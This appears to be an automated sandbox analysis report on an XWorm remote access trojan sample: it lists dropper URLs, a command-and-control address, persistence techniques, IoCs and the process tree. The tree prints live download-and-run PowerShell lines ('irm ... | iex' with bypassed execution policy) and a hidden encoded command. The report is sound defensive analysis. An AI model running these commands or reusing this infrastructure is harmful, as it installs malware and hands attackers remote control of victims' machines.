xworm | 7d83f37893fa8a17d42fe040878b30e1015286849931be05c60c908c3759d576

Analysis

max time kernel
299s
max time network
298s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20250113-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
24-01-2025 07:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.txt
Size

261B
MD5

b7d1dea96fc88cf58391d928a3558e32
SHA1

c4a5be1b46c579c8405006c7da0b672181e90403
SHA256

7d83f37893fa8a17d42fe040878b30e1015286849931be05c60c908c3759d576
SHA512

08b08f2bf4f735c673f550c432badcf42e625e240971b78b8dc5d5c43f48076196aac44926882e4e0483f122a32c6633b6d57467e05ffe30fd5ee4190c351572

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/Discord.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/GoogleChrome.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/explorer.exe

exe.dropper

https://github.com/AmjadBalls/TEST/raw/refs/heads/main/svchost.exe

Extracted

Family

xworm

147.185.221.24:35724

Attributes

Install_directory
%ProgramData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00280000000462bd-294.dat	family_xworm
behavioral1/memory/5288-304-0x0000000000A20000-0x0000000000A36000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
35	4860	powershell.exe
37	4860	powershell.exe
61	2480	powershell.exe
62	2480	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
1600	PowerShell.exe
4860	powershell.exe
5232	powershell.exe
5596	powershell.exe
5744	powershell.exe
5652	powershell.exe
5928	powershell.exe
5232	powershell.exe
6008	powershell.exe
5348	powershell.exe
5884	powershell.exe
2480	powershell.exe
5232	powershell.exe
5596	powershell.exe
5744	powershell.exe
6008	powershell.exe
5348	powershell.exe
3964	powershell.exe
4788	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\Control Panel\International\Geo\Nation	Discord.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk	Discord.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Discord.lnk	Discord.exe

Executes dropped EXE 5 IoCs

pid	Process
5288	Discord.exe
5780	Discord
5652	Discord
2952	Discord
728	Discord

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Discord = "C:\\ProgramData\\Discord"	Discord.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
36	raw.githubusercontent.com
37	raw.githubusercontent.com
62	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
68	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20250124071739.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\945a91fc-a6df-4ea9-9d59-7a6f0ab929fa.tmp	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5920	schtasks.exe

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
1600	PowerShell.exe
1600	PowerShell.exe
1600	PowerShell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
4860	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
3152	msedge.exe
3152	msedge.exe
4788	powershell.exe
4788	powershell.exe
2092	msedge.exe
2092	msedge.exe
4788	powershell.exe
2480	powershell.exe
2480	powershell.exe
2480	powershell.exe
5232	powershell.exe
5232	powershell.exe
5232	powershell.exe
5596	powershell.exe
5596	powershell.exe
5596	powershell.exe
5744	powershell.exe
5744	powershell.exe
5744	powershell.exe
6008	powershell.exe
6008	powershell.exe
6008	powershell.exe
5348	powershell.exe
5348	powershell.exe
5412	identity_helper.exe
5412	identity_helper.exe
5348	powershell.exe
5884	powershell.exe
5884	powershell.exe
5884	powershell.exe
5652	powershell.exe
5652	powershell.exe
5652	powershell.exe
5928	powershell.exe
5928	powershell.exe
5928	powershell.exe
5232	powershell.exe
5232	powershell.exe
5232	powershell.exe
3048	msedge.exe
3048	msedge.exe
3048	msedge.exe
3048	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2092	msedge.exe
2092	msedge.exe
2092	msedge.exe
2092	msedge.exe
2092	msedge.exe
2092	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1600	PowerShell.exe
Token: SeDebugPrivilege	4860	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	5232	powershell.exe
Token: SeIncreaseQuotaPrivilege	5232	powershell.exe
Token: SeSecurityPrivilege	5232	powershell.exe
Token: SeTakeOwnershipPrivilege	5232	powershell.exe
Token: SeLoadDriverPrivilege	5232	powershell.exe
Token: SeSystemProfilePrivilege	5232	powershell.exe
Token: SeSystemtimePrivilege	5232	powershell.exe
Token: SeProfSingleProcessPrivilege	5232	powershell.exe
Token: SeIncBasePriorityPrivilege	5232	powershell.exe
Token: SeCreatePagefilePrivilege	5232	powershell.exe
Token: SeBackupPrivilege	5232	powershell.exe
Token: SeRestorePrivilege	5232	powershell.exe
Token: SeShutdownPrivilege	5232	powershell.exe
Token: SeDebugPrivilege	5232	powershell.exe
Token: SeSystemEnvironmentPrivilege	5232	powershell.exe
Token: SeRemoteShutdownPrivilege	5232	powershell.exe
Token: SeUndockPrivilege	5232	powershell.exe
Token: SeManageVolumePrivilege	5232	powershell.exe
Token: 33	5232	powershell.exe
Token: 34	5232	powershell.exe
Token: 35	5232	powershell.exe
Token: 36	5232	powershell.exe
Token: SeDebugPrivilege	5596	powershell.exe
Token: SeIncreaseQuotaPrivilege	5596	powershell.exe
Token: SeSecurityPrivilege	5596	powershell.exe
Token: SeTakeOwnershipPrivilege	5596	powershell.exe
Token: SeLoadDriverPrivilege	5596	powershell.exe
Token: SeSystemProfilePrivilege	5596	powershell.exe
Token: SeSystemtimePrivilege	5596	powershell.exe
Token: SeProfSingleProcessPrivilege	5596	powershell.exe
Token: SeIncBasePriorityPrivilege	5596	powershell.exe
Token: SeCreatePagefilePrivilege	5596	powershell.exe
Token: SeBackupPrivilege	5596	powershell.exe
Token: SeRestorePrivilege	5596	powershell.exe
Token: SeShutdownPrivilege	5596	powershell.exe
Token: SeDebugPrivilege	5596	powershell.exe
Token: SeSystemEnvironmentPrivilege	5596	powershell.exe
Token: SeRemoteShutdownPrivilege	5596	powershell.exe
Token: SeUndockPrivilege	5596	powershell.exe
Token: SeManageVolumePrivilege	5596	powershell.exe
Token: 33	5596	powershell.exe
Token: 34	5596	powershell.exe
Token: 35	5596	powershell.exe
Token: 36	5596	powershell.exe
Token: SeDebugPrivilege	5744	powershell.exe
Token: SeIncreaseQuotaPrivilege	5744	powershell.exe
Token: SeSecurityPrivilege	5744	powershell.exe
Token: SeTakeOwnershipPrivilege	5744	powershell.exe
Token: SeLoadDriverPrivilege	5744	powershell.exe
Token: SeSystemProfilePrivilege	5744	powershell.exe
Token: SeSystemtimePrivilege	5744	powershell.exe
Token: SeProfSingleProcessPrivilege	5744	powershell.exe
Token: SeIncBasePriorityPrivilege	5744	powershell.exe
Token: SeCreatePagefilePrivilege	5744	powershell.exe
Token: SeBackupPrivilege	5744	powershell.exe
Token: SeRestorePrivilege	5744	powershell.exe
Token: SeShutdownPrivilege	5744	powershell.exe
Token: SeDebugPrivilege	5744	powershell.exe
Token: SeSystemEnvironmentPrivilege	5744	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2092	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1600 wrote to memory of 4860	1600	PowerShell.exe	102
PID 1600 wrote to memory of 4860	1600	PowerShell.exe	102
PID 4860 wrote to memory of 2092	4860	powershell.exe	105
PID 4860 wrote to memory of 2092	4860	powershell.exe	105
PID 2092 wrote to memory of 1768	2092	msedge.exe	107
PID 2092 wrote to memory of 1768	2092	msedge.exe	107
PID 4860 wrote to memory of 1372	4860	powershell.exe	106
PID 4860 wrote to memory of 1372	4860	powershell.exe	106
PID 1372 wrote to memory of 3976	1372	csc.exe	108
PID 1372 wrote to memory of 3976	1372	csc.exe	108
PID 4860 wrote to memory of 3964	4860	powershell.exe	109
PID 4860 wrote to memory of 3964	4860	powershell.exe	109
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 4012	2092	msedge.exe	110
PID 2092 wrote to memory of 3152	2092	msedge.exe	111
PID 2092 wrote to memory of 3152	2092	msedge.exe	111
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112
PID 2092 wrote to memory of 4812	2092	msedge.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
1⤵
PID:3684

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -Command "Start-Process PowerShell -ArgumentList 'irm "https://tinyurl.com/4j72ashp/" | iex' -Verb RunAs"
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1600
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm https://tinyurl.com/4j72ashp/ | iex
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://as2.ftcdn.net/v2/jpg/00/53/69/65/1000_F_53696591_9LO1bsQUpl2zIolFMFokrQyt04Z5dzXd.jpg
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb178946f8,0x7ffb17894708,0x7ffb17894718
      4⤵
      PID:1768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
      4⤵
      PID:4012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
      4⤵
      PID:4812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
      4⤵
      PID:2624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
      4⤵
      PID:1560
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
      4⤵
      PID:6024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
      4⤵
      Drops file in Program Files directory
      PID:5328
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff7408e5460,0x7ff7408e5470,0x7ff7408e5480
        5⤵
        
        PID:5720
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
      4⤵
      PID:5392
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
      4⤵
      PID:2068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
      4⤵
      PID:5940
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
      4⤵
      PID:5948
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,11614961687783399358,6377311712947872548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3244 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3048
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0sb5rtez\0sb5rtez.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1372
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF86A.tmp" "c:\Users\Admin\AppData\Local\Temp\0sb5rtez\CSC3A3CAA7EC2D84F19B489B3B43B873448.TMP"
      4⤵
      PID:3976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAGMAQQBCAHYAQQBIAGMAQQBaAFEAQgB5AEEASABNAEEAYQBBAEIAbABBAEcAdwBBAGIAQQBBAGcAQQBDADAAQQBUAGcAQgB2AEEARgBBAEEAYwBnAEIAdgBBAEcAWQBBAGEAUQBCAHMAQQBHAFUAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARgBBAEEAYgB3AEIAcwBBAEcAawBBAFkAdwBCADUAQQBDAEEAQQBRAGcAQgA1AEEASABBAEEAWQBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBGAGMAQQBhAFEAQgB1AEEARwBRAEEAYgB3AEIAMwBBAEYATQBBAGQAQQBCADUAQQBHAHcAQQBaAFEAQQBnAEEARQBnAEEAYQBRAEIAawBBAEcAUQBBAFoAUQBCAHUAQQBDAEEAQQBMAFEAQgBGAEEARwA0AEEAWQB3AEIAdgBBAEcAUQBBAFoAUQBCAGsAQQBFAE0AQQBiAHcAQgB0AEEARwAwAEEAWQBRAEIAdQBBAEcAUQBBAEkAQQBBAGkAQQBHAE0AQQBRAFEAQgBDAEEASABZAEEAUQBRAEIASQBBAEcATQBBAFEAUQBCAGEAQQBGAEUAQQBRAGcAQgA1AEEARQBFAEEAUwBBAEIATgBBAEUARQBBAFkAUQBCAEIAQQBFAEkAQQBiAEEAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcASQBBAFEAUQBCAEIAQQBHAGMAQQBRAFEAQgBEAEEARABBAEEAUQBRAEIAVwBBAEgAYwBBAFEAZwBCAHcAQQBFAEUAQQBSAHcAQQAwAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGQAZwBCAEIAQQBFAGcAQQBZAHcAQgBCAEEARgBVAEEAZAB3AEIAQwBBAEQAQQBBAFEAUQBCAEkAQQBHAHMAQQBRAFEAQgBpAEEARQBFAEEAUQBnAEIAcwBBAEUARQBBAFEAdwBCAEIAQQBFAEUAQQBVAHcAQgBCAEEARQBJAEEAYwBBAEIAQgBBAEUAYwBBAFUAUQBCAEIAQQBGAG8AQQBRAFEAQgBDAEEARwB3AEEAUQBRAEIASABBAEQAUQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIATgBBAEUARQBBAFkAZwBCADMAQQBFAEkAQQBkAEEAQgBCAEEARQBjAEEATQBBAEIAQgBBAEYAawBBAFUAUQBCAEMAQQBIAFUAQQBRAFEAQgBIAEEARgBFAEEAUQBRAEIASgBBAEUARQBBAFEAUQBCAHAAQQBFAEUAQQBSAFEAQgBGAEEARQBFAEEAVwBnAEIAQgBBAEUASQBBAGEAdwBCAEIAQQBFAE0AQQBNAEEAQgBCAEEARgBRAEEAVQBRAEIAQwBBAEgAYwBBAFEAUQBCAEcAQQBFAEUAQQBRAFEAQgBqAEEARwBjAEEAUQBnAEIAcwBBAEUARQBBAFIAdwBCAFoAQQBFAEUAQQBXAGcAQgBSAEEARQBJAEEAZQBRAEIAQgBBAEUAYwBBAFYAUQBCAEIAQQBHAEkAQQBaAHcAQgBDAEEARwBvAEEAUQBRAEIASABBAEYAVQBBAFEAUQBCAEoAQQBFAEUAQQBRAFEAQgAwAEEARQBFAEEAUgBRAEIAVgBBAEUARQBBAFoAUQBCAEIAQQBFAEkAQQBhAGcAQgBCAEEARQBjAEEAZAB3AEIAQgBBAEcAUQBBAFUAUQBCAEMAQQBIAG8AQQBRAFEAQgBIAEEARwBzAEEAUQBRAEIAaQBBAEgAYwBBAFEAZwBCADEAQQBFAEUAQQBSAGcAQgBCAEEARQBFAEEAVwBRAEIAUgBBAEUASQBBAE0AQQBCAEIAQQBFAGMAQQBaAHcAQgBCAEEARQBrAEEAUQBRAEIAQgBBAEcANABBAFEAUQBCAEYAQQBFADAAQQBRAFEAQgBQAEEARwBjAEEAUQBnAEIAagBBAEUARQBBAFIAZwBCAEIAQQBFAEUAQQBZAHcAQgBuAEEARQBJAEEAZABnAEIAQgBBAEUAYwBBAFkAdwBCAEIAQQBHAE0AQQBaAHcAQgBDAEEARwBnAEEAUQBRAEIASABBAEQAQQBBAFEAUQBCAFMAQQBFAEUAQQBRAGcAQgBvAEEARQBFAEEAUwBBAEIAUgBBAEUARQBBAFcAUQBCAFIAQQBFAEUAQQBiAGcAQgBCAEEARQBNAEEAUwBRAEIAQgBBAEUATQBBAFoAdwBCAEMAQQBIAGMAQQBRAFEAQgBIAEEARABnAEEAUQBRAEIAawBBAEgAYwBBAFEAZwBCAHMAQQBFAEUAQQBTAEEAQgBKAEEARQBFAEEAWQB3AEIAMwBBAEUASQBBAGIAdwBCAEIAQQBFAGMAQQBWAFEAQgBCAEEARwBJAEEAUQBRAEIAQwBBAEgATQBBAFEAUQBCAEQAQQBFAEUAQQBRAFEA